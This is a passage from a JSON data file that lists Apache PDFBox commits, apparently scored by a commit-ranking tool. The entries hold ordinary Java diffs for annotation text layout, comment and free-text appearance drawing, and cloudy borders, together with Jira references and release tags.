getInterWordSpacing(float width)", + "+ {", + "+ return (width - lineWidth)/(words.size()-1);", + "+ }", + "+", + "+ void addWord(Word word)", + "+ {", + "+ words.add(word);", + "+ }", + "+ }", + "+ ", + "+ /**", + "+ * An individual word.", + "+ * ", + "+ * A word is defined as a string which must be kept", + "+ * on the same line.", + "+ */", + "+ static class Word", + "+ {", + "+ private AttributedString attributedString;", + "+ private final String textContent;", + "+ ", + "+ Word(String text)", + "+ {", + "+ textContent = text;", + "+ }", + "+ ", + "+ String getText()", + "+ {", + "+ return textContent;", + "+ }", + "+ ", + "+ AttributedString getAttributes()", + "+ {", + "+ return attributedString;", + "+ }", + "+ ", + "+ void setAttributes(AttributedString as)", + "+ {", + "+ this.attributedString = as;", + "+ }", + "+ }", + "+}", + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/layout/PlainTextFormatter.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/layout/PlainTextFormatter.java", + "new file mode 100644", + "index 000000000..6458d8404", + "--- /dev/null", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/layout/PlainTextFormatter.java", + "@@ -0,0 +1,287 @@", + "+/*", + "+ * Licensed to the Apache Software Foundation (ASF) under one or more", + "+ * contributor license agreements. See the NOTICE file distributed with", + "+ * this work for additional information regarding copyright ownership.", + "+ * The ASF licenses this file to You under the Apache License, Version 2.0", + "+ * (the \"License\"); you may not use this file except in compliance with", + "+ * the License. You may obtain a copy of the License at", + "+ *", + "+ * http://www.apache.org/licenses/LICENSE-2.0", + "+ *", + "+ * Unless required by applicable law or agreed to in writing, software", + "+ * distributed under the License is distributed on an \"AS IS\" BASIS,", + "+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", + "+ * See the License for the specific language governing permissions and", + "+ * limitations under the License.", + "+ */", + "+package org.apache.pdfbox.pdmodel.interactive.annotation.layout;", + "+", + "+import java.io.IOException;", + "+import java.util.List;", + "+", + "+import org.apache.pdfbox.pdmodel.PDAppearanceContentStream;", + "+import org.apache.pdfbox.pdmodel.interactive.annotation.layout.PlainText.Line;", + "+import org.apache.pdfbox.pdmodel.interactive.annotation.layout.PlainText.Paragraph;", + "+import org.apache.pdfbox.pdmodel.interactive.annotation.layout.PlainText.TextAttribute;", + "+import org.apache.pdfbox.pdmodel.interactive.annotation.layout.PlainText.Word;", + "+", + "+/**", + "+ * TextFormatter to handle plain text formatting.", + "+ * ", + "+ * The text formatter will take a single value or an array of values which", + "+ * are treated as paragraphs.", + "+ */", + "+", + "+class PlainTextFormatter", + "+{", + "+ ", + "+ enum TextAlign", + "+ {", + "+ LEFT(0), CENTER(1), RIGHT(2), JUSTIFY(4);", + "+ ", + "+ private final int alignment;", + "+ ", + "+ private TextAlign(int alignment)", + "+ {", + "+ this.alignment = alignment;", + "+ }", + "+ ", + "+ int getTextAlign()", + "+ {", + "+ return alignment;", + "+ }", + "+ ", + "+ public static TextAlign valueOf(int alignment)", + "+ {", + "+ for (TextAlign textAlignment : TextAlign.values())", + "+ {", + "+ if (textAlignment.getTextAlign() == alignment)", + "+ {", + "+ return textAlignment;", + "+ }", + "+ }", + "+ return TextAlign.LEFT;", + "+ }", + "+ }", + "+", + "+ /**", + "+ * The scaling factor for font units to PDF units", + "+ */", + "+ private static final int FONTSCALE = 1000;", + "+ ", + "+ private final AppearanceStyle appearanceStyle;", + "+ private final boolean wrapLines;", + "+ private final float width;", + "+ ", + "+ private final PDAppearanceContentStream contents;", + "+ private final PlainText textContent;", + "+ private final TextAlign textAlignment;", + "+ ", + "+ private float horizontalOffset;", + "+ private float verticalOffset;", + "+ ", + "+ static class Builder", + "+ {", + "+", + "+ // required parameters", + "+ private PDAppearanceContentStream contents;", + "+", + "+ // optional parameters", + "+ private AppearanceStyle appearanceStyle;", + "+ private boolean wrapLines = false;", + "+ private float width = 0f;", + "+ private PlainText textContent;", + "+ private TextAlign textAlignment = TextAlign.LEFT;", + "+ ", + "+ ", + "+ // initial offset from where to start the position of the first line", + "+ private float horizontalOffset = 0f;", + "+ private float verticalOffset = 0f;", + "+ ", + "+ Builder(PDAppearanceContentStream contents)", + "+ {", + "+ this.contents = contents;", + "+ }", + "+", + "+ Builder style(AppearanceStyle appearanceStyle)", + "+ {", + "+ this.appearanceStyle = appearanceStyle;", + "+ return this;", + "+ }", + "+ ", + "+ Builder wrapLines(boolean wrapLines)", + "+ {", + "+ this.wrapLines = wrapLines;", + "+ return this;", + "+ }", + "+", + "+ Builder width(float width)", + "+ {", + "+ this.width = width;", + "+ return this;", + "+ }", + "+", + "+ Builder textAlign(int alignment)", + "+ {", + "+ this.textAlignment = TextAlign.valueOf(alignment);", + "+ return this;", + "+ }", + "+ ", + "+ Builder textAlign(TextAlign alignment)", + "+ {", + "+ this.textAlignment = alignment;", + "+ return this;", + "+ }", + "+ ", + "+ ", + "+ Builder text(PlainText textContent)", + "+ {", + "+ this.textContent = textContent;", + "+ return this;", + "+ }", + "+ ", + "+ Builder initialOffset(float horizontalOffset, float verticalOffset)", + "+ {", + "+ this.horizontalOffset = horizontalOffset;", + "+ this.verticalOffset = verticalOffset;", + "+ return this;", + "+ }", + "+ ", + "+ PlainTextFormatter build()", + "+ {", + "+ return new PlainTextFormatter(this);", + "+ }", + "+ }", + "+ ", + "+ private PlainTextFormatter(Builder builder)", + "+ {", + "+ appearanceStyle = builder.appearanceStyle;", + "+ wrapLines = builder.wrapLines;", + "+ width = builder.width;", + "+ contents = builder.contents;", + "+ textContent = builder.textContent;", + "+ textAlignment = builder.textAlignment;", + "+ horizontalOffset = builder.horizontalOffset;", + "+ verticalOffset = builder.verticalOffset;", + "+ }", + "+ ", + "+ /**", + "+ * Format the text block.", + "+ * ", + "+ * @throws IOException if there is an error writing to the stream.", + "+ */", + "+ public void format() throws IOException", + "+ {", + "+ if (textContent != null && !textContent.getParagraphs().isEmpty())", + "+ {", + "+ boolean isFirstParagraph = true;", + "+ \tfor (Paragraph paragraph : textContent.getParagraphs())", + "+ {", + "+ if (wrapLines)", + "+ {", + "+ List lines = paragraph.getLines(", + "+ appearanceStyle.getFont(), ", + "+ appearanceStyle.getFontSize(), ", + "+ width", + "+ );", + "+ processLines(lines, isFirstParagraph);", + "+ isFirstParagraph = false;", + "+ }", + "+ else", + "+ {", + "+ float startOffset = 0f;", + "+ ", + "+ ", + "+ float lineWidth = appearanceStyle.getFont().getStringWidth(paragraph.getText()) *", + "+ appearanceStyle.getFontSize() / FONTSCALE;", + "+ ", + "+ if (lineWidth < width) ", + "+ {", + "+ switch (textAlignment)", + "+ {", + "+ case CENTER:", + "+ startOffset = (width - lineWidth)/2;", + "+ break;", + "+ case RIGHT:", + "+ startOffset = width - lineWidth;", + "+ break;", + "+ case JUSTIFY:", + "+ default:", + "+ startOffset = 0f;", + "+ }", + "+ }", + "+ ", + "+ contents.newLineAtOffset(horizontalOffset + startOffset, verticalOffset);", + "+ contents.showText(paragraph.getText());", + "+ }", + "+ }", + "+ }", + "+ }", + "+", + "+ /**", + "+ * Process lines for output. ", + "+ *", + "+ * Process lines for an individual paragraph and generate the ", + "+ * commands for the content stream to show the text.", + "+ * ", + "+ * @param lines the lines to process.", + "+ * @throws IOException if there is an error writing to the stream.", + "+ */", + "+ private void processLines(List lines, boolean isFirstParagraph) throws IOException", + "+ {", + "+ float wordWidth = 0f;", + "+", + "+ float lastPos = 0f;", + "+ float startOffset = 0f;", + "+ float interWordSpacing = 0f;", + "+ ", + "+ for (Line line : lines)", + "+ {", + "+ switch (textAlignment)", + "+ {", + "+ case CENTER:", + "+ startOffset = (width - line.getWidth())/2;", + "+ break;", + "+ case RIGHT:", + "+ startOffset = width - line.getWidth();", + "+ break;", + "+ case JUSTIFY:", + "+ if (lines.indexOf(line) != lines.size() -1)", + "+ {", + "+ interWordSpacing = line.getInterWordSpacing(width);", + "+ }", + "+ break;", + "+ default:", + "+ startOffset = 0f;", + "+ }", + "+ ", + "+ float offset = -lastPos + startOffset + horizontalOffset;", + "+ ", + "+ if (lines.indexOf(line) == 0 && isFirstParagraph)", + "+ {", + "+ contents.newLineAtOffset(offset, verticalOffset);", + "+ }", + "+ else", + "+ {", + "+ // keep the last position", + "+ verticalOffset = verticalOffset - appearanceStyle.getLeading();", + "+ contents.newLineAtOffset(offset, - appearanceStyle.getLeading());", + "+ }", + "+", + "+ lastPos += offset; ", + "+", + "+ List words = line.getWords();", + "+ for (Word word : words)", + "+ {", + "+ contents.showText(word.getText());", + "+ wordWidth = (Float) word.getAttributes().getIterator().getAttribute(TextAttribute.WIDTH);", + "+ if (words.indexOf(word) != words.size() -1)", + "+ {", + "+ contents.newLineAtOffset(wordWidth + interWordSpacing, 0f);", + "+ lastPos = lastPos + wordWidth + interWordSpacing;", + "+ }", + "+ }", + "+ }", + "+ horizontalOffset = horizontalOffset - lastPos;", + "+ }", + "+}" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/layout/AppearanceStyle.java", + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/layout/PlainText.java", + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/layout/PlainTextFormatter.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4212": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4212", + "relevance": 2 + } + ] + }, + { + "commit_id": "8a83632171863ba52fda21eeec4ceb2232cbc721", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1530732425, + "hunks": 1, + "message": "PDFBOX-4242: fix javadoc git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1835081 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType0Font.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType0Font.java", + "index dd5c7255c..f2e225997 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType0Font.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType0Font.java", + "@@ -203,4 +203,4 @@ public class PDType0Font extends PDFont implements PDVectorFont", + " * @param closeTTF whether to close the ttf parameter after embedding. Must be true when the ttf", + "- * parameter was created in the load(), false when the ttf parameter was passed to the load()", + "- * method.", + "+ * parameter was created in the load() method, false when the ttf parameter was passed to the", + "+ * load() method.", + " * @param vertical" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType0Font.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4242": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "2.0.12", + "2.0.13", + "2.0.14", + "2.0.15", + "2.0.16", + "2.0.17", + "2.0.18", + "2.0.19", + "2.0.20", + "2.0.21", + "2.0.22", + "2.0.23", + "2.0.24", + "2.0.25", + "2.0.26", + "2.0.27", + "2.0.28", + "2.0.29", + "2.0.30", + "2.0.31", + "2.0.32" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4242", + "relevance": 2 + } + ] + }, + { + "commit_id": "f2db0f33b3566b98418065bbe238fcd5e05ce11c", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1530207055, + "hunks": 4, + "message": "PDFBOX-3353: correct drawing of /Comment, use outer shape only, prepaint area with CA ca 0.6, draw rectangle in reverse order to get donut effect, make width thicker git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1834631 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", + "index 5c49ce015..42a52117e 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", + "@@ -597,8 +597,18 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", + " contentStream.setLineCapStyle(0);", + "- contentStream.setLineWidth(0.59f); // value from Adobe", + "+ contentStream.setLineWidth(200);", + "+ // Adobe first fills a white rectangle with CA ca 0.6, so do we", + "+ contentStream.saveGraphicsState();", + "+ contentStream.setLineWidth(1);", + "+ PDExtendedGraphicsState gs = new PDExtendedGraphicsState();", + "+ gs.setAlphaSourceFlag(false);", + "+ gs.setStrokingAlphaConstant(0.6f);", + "+ gs.setNonStrokingAlphaConstant(0.6f);", + "+ gs.setBlendMode(BlendMode.NORMAL);", + "+ contentStream.setGraphicsStateParameters(gs);", + "+ contentStream.setNonStrokingColor(1f);", + " contentStream.addRect(0.3f, 0.3f, 18-0.6f, 18-0.6f);", + "- contentStream.stroke();", + "+ contentStream.fill();", + "+ contentStream.restoreGraphicsState();", + "- contentStream.setNonStrokingColor(0);", + " contentStream.transform(Matrix.getScaleInstance(0.003f, 0.003f));", + "@@ -606,3 +616,3 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", + "- // shape from Font Awesome by \"printing\" comment.svg into a PDF", + "+ // outer shape from Font Awesome by \"printing\" comment.svg into a PDF", + " contentStream.moveTo(2549, 5269);", + "@@ -618,15 +628,10 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", + " contentStream.closePath();", + "- contentStream.moveTo(2549, 2035);", + "- contentStream.curveTo(2315, 2035, 2083, 2071, 1860, 2141);", + "- contentStream.lineTo(1661, 2204);", + "- contentStream.lineTo(1490, 2083);", + "- contentStream.curveTo(1364, 1994, 1192, 1895, 984, 1828);", + "- contentStream.curveTo(1048, 1935, 1111, 2054, 1159, 2182);", + "- contentStream.lineTo(1252, 2429);", + "- contentStream.lineTo(1071, 2620);", + "- contentStream.curveTo(912, 2790, 721, 3070, 721, 3441);", + "- contentStream.curveTo(721, 4216, 1541, 4847, 2549, 4847);", + "- contentStream.curveTo(3558, 4847, 4378, 4216, 4378, 3441);", + "- contentStream.curveTo(4378, 2666, 3558, 2035, 2549, 2035);", + "- contentStream.fill();", + "+", + "+ // can't use addRect: if we did that, we wouldn't get the donut effect", + "+ contentStream.moveTo(0.3f / 0.003f - 500, 0.3f / 0.003f + 300);", + "+ contentStream.lineTo(0.3f / 0.003f - 500, 0.3f / 0.003f + 300 + 17.4f / 0.003f);", + "+ contentStream.lineTo(0.3f / 0.003f - 500 + 17.4f / 0.003f, 0.3f / 0.003f + 300 + 17.4f / 0.003f);", + "+ contentStream.lineTo(0.3f / 0.003f - 500 + 17.4f / 0.003f, 0.3f / 0.003f + 300);", + "+", + "+ contentStream.closeAndFillAndStroke();", + " }" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-3353": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-3353", + "relevance": 2 + } + ] + }, + { + "commit_id": "49254d2d8bafa7ea4f95ae5dd1dcffdaae557492", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1527529586, + "hunks": 18, + "message": "PDFBOX-3353: move drawing of callout line before rectangle drawing; extract non stroking color from /DA which Adobe uses as stroking color git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1832412 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java", + "index 6cd839ea9..08631c951 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java", + "@@ -21,2 +21,9 @@ import org.apache.commons.logging.Log;", + " import org.apache.commons.logging.LogFactory;", + "+import org.apache.fontbox.util.Charsets;", + "+import org.apache.pdfbox.contentstream.PDFStreamEngine;", + "+import org.apache.pdfbox.contentstream.operator.Operator;", + "+import org.apache.pdfbox.cos.COSArray;", + "+import org.apache.pdfbox.cos.COSBase;", + "+import org.apache.pdfbox.cos.COSObject;", + "+import org.apache.pdfbox.pdfparser.PDFStreamParser;", + " import org.apache.pdfbox.pdmodel.PDAppearanceContentStream;", + "@@ -24,3 +31,5 @@ import org.apache.pdfbox.pdmodel.common.PDRectangle;", + " import org.apache.pdfbox.pdmodel.graphics.color.PDColor;", + "+import org.apache.pdfbox.pdmodel.graphics.color.PDDeviceCMYK;", + " import org.apache.pdfbox.pdmodel.graphics.color.PDDeviceGray;", + "+import org.apache.pdfbox.pdmodel.graphics.color.PDDeviceRGB;", + " import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotation;", + "@@ -64,3 +73,2 @@ public class PDFreeTextAppearanceHandler extends PDAbstractAppearanceHandler", + " AnnotationBorder ab = AnnotationBorder.getAnnotationBorder(annotation, annotation.getBorderStyle());", + "- PDColor color = annotation.getColor();", + "@@ -76,7 +84,2 @@ public class PDFreeTextAppearanceHandler extends PDAbstractAppearanceHandler", + " }", + "- if (color == null || color.getComponents().length == 0)", + "- {", + "- //TODO remove this when we've managed to parse /DA", + "- color = new PDColor(new float[]{0}, PDDeviceGray.INSTANCE);", + "- }", + "@@ -84,3 +87,2 @@ public class PDFreeTextAppearanceHandler extends PDAbstractAppearanceHandler", + "-", + " try (PDAppearanceContentStream cs = getNormalAppearanceAsContentStream())", + "@@ -91,4 +93,6 @@ public class PDFreeTextAppearanceHandler extends PDAbstractAppearanceHandler", + "- //TODO Adobe uses the last non stroking color from /DA as stroking color. WTF????", + "- boolean hasStroke = cs.setStrokingColorOnDemand(color);", + "+ // Adobe uses the last non stroking color from /DA as stroking color!", + "+ PDColor strokingColor = extractNonStrokingColor(annotation);", + "+ boolean hasStroke = cs.setStrokingColorOnDemand(strokingColor);", + "+", + " if (ab.dashArray != null)", + "@@ -99,2 +103,53 @@ public class PDFreeTextAppearanceHandler extends PDAbstractAppearanceHandler", + "+ // draw callout line(s)", + "+ // must be done before retangle paint to avoid a line cutting through cloud", + "+ // see CTAN-example-Annotations.pdf", + "+ for (int i = 0; i < pathsArray.length / 2; ++i)", + "+ {", + "+ float x = pathsArray[i * 2];", + "+ float y = pathsArray[i * 2 + 1];", + "+ if (i == 0)", + "+ {", + "+ if (SHORT_STYLES.contains(annotation.getLineEndingStyle()))", + "+ {", + "+ // modify coordinate to shorten the segment", + "+ // https://stackoverflow.com/questions/7740507/extend-a-line-segment-a-specific-distance", + "+ float x1 = pathsArray[2];", + "+ float y1 = pathsArray[3];", + "+ float len = (float) (Math.sqrt(Math.pow(x - x1, 2) + Math.pow(y - y1, 2)));", + "+ if (Float.compare(len, 0) != 0)", + "+ {", + "+ x += (x1 - x) / len * ab.width;", + "+ y += (y1 - y) / len * ab.width;", + "+ }", + "+ }", + "+ cs.moveTo(x, y);", + "+ }", + "+ else", + "+ {", + "+ cs.lineTo(x, y);", + "+ }", + "+ }", + "+ cs.stroke();", + "+", + "+ // do a transform so that first \"arm\" is imagined flat, like in line handler", + "+ // the alternative would be to apply the transform to the LE shapes directly,", + "+ // which would be more work and produce code difficult to understand", + "+ // paint the styles here and after line(s) draw, to avoid line crossing a filled shape", + "+ if (\"FreeTextCallout\".equals(annotation.getIntent())", + "+ && !LE_NONE.equals(annotation.getLineEndingStyle())", + "+ && pathsArray.length >= 4)", + "+ {", + "+ // check only needed to avoid q cm Q if LE_NONE", + "+ float x2 = pathsArray[2];", + "+ float y2 = pathsArray[3];", + "+ float x1 = pathsArray[0];", + "+ float y1 = pathsArray[1];", + "+ double angle = Math.atan2(y2 - y1, x2 - x1);", + "+ cs.saveGraphicsState();", + "+ cs.transform(Matrix.getRotateInstance(angle, x1, y1));", + "+ drawStyle(annotation.getLineEndingStyle(), cs, 0, 0, ab.width, hasStroke, hasBackground);", + "+ cs.restoreGraphicsState();", + "+ }", + "+", + "@@ -185,24 +240,47 @@ public class PDFreeTextAppearanceHandler extends PDAbstractAppearanceHandler", + " }", + "+ }", + "+ catch (IOException ex)", + "+ {", + "+ LOG.error(ex);", + "+ }", + "+ }", + "- // draw callout line(s)", + "- for (int i = 0; i < pathsArray.length / 2; ++i)", + "+ // get the last non stroking color from the /DA entry", + "+ private PDColor extractNonStrokingColor(PDAnnotationFreeText annotation)", + "+ {", + "+ // It could also work with a regular expression, but that should be written so that", + "+ // \"/LucidaConsole 13.94766 Tf .392 .585 .93 rg\" does not produce \"2 .585 .93 rg\" as result", + "+ // Another alternative might be to create a PDDocument and a PDPage with /DA content as /Content,", + "+ // process the whole thing and then get the non stroking color.", + "+", + "+ PDColor strokingColor = new PDColor(new float[]{0}, PDDeviceGray.INSTANCE);", + "+ String defaultAppearance = annotation.getDefaultAppearance();", + "+ if (defaultAppearance == null)", + "+ {", + "+ return strokingColor;", + "+ }", + "+", + "+ try", + "+ {", + "+ // not sure if charset is correct, but we only need numbers and simple characters", + "+ PDFStreamParser parser = new PDFStreamParser(defaultAppearance.getBytes(Charsets.US_ASCII));", + "+ COSArray arguments = new COSArray();", + "+ COSArray colors = null;", + "+ Operator graphicOp = null;", + "+ for (Object token = parser.parseNextToken(); token != null; token = parser.parseNextToken())", + " {", + "- float x = pathsArray[i * 2];", + "- float y = pathsArray[i * 2 + 1];", + "- if (i == 0)", + "+ if (token instanceof COSObject)", + " {", + "- if (SHORT_STYLES.contains(annotation.getLineEndingStyle()))", + "+ arguments.add(((COSObject) token).getObject());", + "+ }", + "+ else if (token instanceof Operator)", + "+ {", + "+ Operator op = (Operator) token;", + "+ String name = op.getName();", + "+ if (\"g\".equals(name) || \"rg\".equals(name) || \"k\".equals(name))", + " {", + "- // modify coordinate to shorten the segment", + "- // https://stackoverflow.com/questions/7740507/extend-a-line-segment-a-specific-distance", + "- float x1 = pathsArray[2];", + "- float y1 = pathsArray[3];", + "- float len = (float) (Math.sqrt(Math.pow(x - x1, 2) + Math.pow(y - y1, 2)));", + "- if (Float.compare(len, 0) != 0)", + "- {", + "- x += (x1 - x) / len * ab.width;", + "- y += (y1 - y) / len * ab.width;", + "- }", + "+ graphicOp = op;", + "+ colors = arguments;", + " }", + "- cs.moveTo(x, y);", + "+ arguments = new COSArray();", + " }", + "@@ -210,23 +288,21 @@ public class PDFreeTextAppearanceHandler extends PDAbstractAppearanceHandler", + " {", + "- cs.lineTo(x, y);", + "+ arguments.add((COSBase) token);", + " }", + " }", + "- cs.stroke();", + "-", + "- // do a transform so that first \"arm\" is imagined flat, like in line handler", + "- // the alternative would be to apply the transform to the LE shapes directly,", + "- // which would be more work and produce code difficult to understand", + "- // paint the styles here and after line(s) draw, to avoid line crossing a filled shape", + "- if (\"FreeTextCallout\".equals(annotation.getIntent())", + "- && !LE_NONE.equals(annotation.getLineEndingStyle())", + "- && pathsArray.length >= 4)", + "+ if (graphicOp != null)", + " {", + "- // check only needed to avoid q cm Q if LE_NONE", + "- float x2 = pathsArray[2];", + "- float y2 = pathsArray[3];", + "- float x1 = pathsArray[0];", + "- float y1 = pathsArray[1];", + "- double angle = Math.atan2(y2 - y1, x2 - x1);", + "- cs.transform(Matrix.getRotateInstance(angle, x1, y1));", + "- drawStyle(annotation.getLineEndingStyle(), cs, 0, 0, ab.width, hasStroke, hasBackground);", + "+ switch (graphicOp.getName())", + "+ {", + "+ case \"g\":", + "+ strokingColor = new PDColor(colors, PDDeviceGray.INSTANCE);", + "+ break;", + "+ case \"rg\":", + "+ strokingColor = new PDColor(colors, PDDeviceRGB.INSTANCE);", + "+ break;", + "+ case \"k\":", + "+ strokingColor = new PDColor(colors, PDDeviceCMYK.INSTANCE);", + "+ break;", + "+ default:", + "+ break;", + "+ }", + " }", + "@@ -235,4 +311,5 @@ public class PDFreeTextAppearanceHandler extends PDAbstractAppearanceHandler", + " {", + "- LOG.error(ex);", + "+ LOG.warn(\"Problem parsing /DA, will use default black\", ex);", + " }", + "+ return strokingColor;", + " }" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-3353": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-3353", + "relevance": 2 + } + ] + }, + { + "commit_id": "be5a1b3bf20a54814acd7812b6c820029a275507", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1524674477, + "hunks": 16, + "message": "PDFBOX-3353: add creation of cloudy borders, by Jani Pehkonen git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1830098 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/CloudyBorder.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/CloudyBorder.java", + "new file mode 100644", + "index 000000000..19ad102f5", + "--- /dev/null", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/CloudyBorder.java", + "@@ -0,0 +1,1087 @@", + "+/*", + "+ * Licensed to the Apache Software Foundation (ASF) under one or more", + "+ * contributor license agreements. See the NOTICE file distributed with", + "+ * this work for additional information regarding copyright ownership.", + "+ * The ASF licenses this file to You under the Apache License, Version 2.0", + "+ * (the \"License\"); you may not use this file except in compliance with", + "+ * the License. You may obtain a copy of the License at", + "+ *", + "+ * http://www.apache.org/licenses/LICENSE-2.0", + "+ *", + "+ * Unless required by applicable law or agreed to in writing, software", + "+ * distributed under the License is distributed on an \"AS IS\" BASIS,", + "+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", + "+ * See the License for the specific language governing permissions and", + "+ * limitations under the License.", + "+ */", + "+package org.apache.pdfbox.pdmodel.interactive.annotation.handlers;", + "+", + "+import java.awt.geom.AffineTransform;", + "+import java.awt.geom.Ellipse2D;", + "+import java.awt.geom.PathIterator;", + "+import java.awt.geom.Point2D;", + "+import java.io.IOException;", + "+import java.util.ArrayList;", + "+", + "+import org.apache.pdfbox.pdmodel.common.PDRectangle;", + "+import org.apache.pdfbox.pdmodel.interactive.annotation.PDAppearanceContentStream;", + "+", + "+/**", + "+ * Generates annotation appearances with a cloudy border.", + "+ *

    ", + "+ * Dashed stroke styles are not recommended with cloudy borders. The result would", + "+ * not look good because some parts of the arcs are traced twice by the stroked", + "+ * path. Actually Acrobat Reader's line style dialog does not allow to choose a", + "+ * dashed and a cloudy style at the same time.", + "+ */", + "+", + "+class CloudyBorder", + "+{", + "+ private static final double ANGLE_180_DEG = Math.PI;", + "+ private static final double ANGLE_90_DEG = Math.PI / 2;", + "+ private static final double ANGLE_34_DEG = Math.toRadians(34);", + "+ private static final double ANGLE_12_DEG = Math.toRadians(12);", + "+", + "+ private final PDAppearanceContentStream output;", + "+ private final PDRectangle annotRect;", + "+ private final double intensity;", + "+ private final double lineWidth;", + "+ private PDRectangle rectWithDiff;", + "+ private boolean outputStarted = false;", + "+ private double bboxMinX;", + "+ private double bboxMinY;", + "+ private double bboxMaxX;", + "+ private double bboxMaxY;", + "+", + "+ /**", + "+ * Creates a new CloudyBorder that writes to the specified", + "+ * content stream.", + "+ *", + "+ * @param stream content stream", + "+ * @param intensity intensity of cloudy effect (entry I); typically 1.0 or 2.0", + "+ * @param lineWidth line width for annotation border (entry W)", + "+ * @param rect annotation rectangle (entry Rect)", + "+ */", + "+ CloudyBorder(PDAppearanceContentStream stream, double intensity,", + "+ double lineWidth, PDRectangle rect)", + "+ {", + "+ this.output = stream;", + "+ this.intensity = intensity;", + "+ this.lineWidth = lineWidth;", + "+ this.annotRect = rect;", + "+ }", + "+", + "+ /**", + "+ * Creates a cloudy border for a rectangular annotation.", + "+ * The rectangle is specified by the RD entry and the", + "+ * Rect entry that was passed in to the constructor.", + "+ *

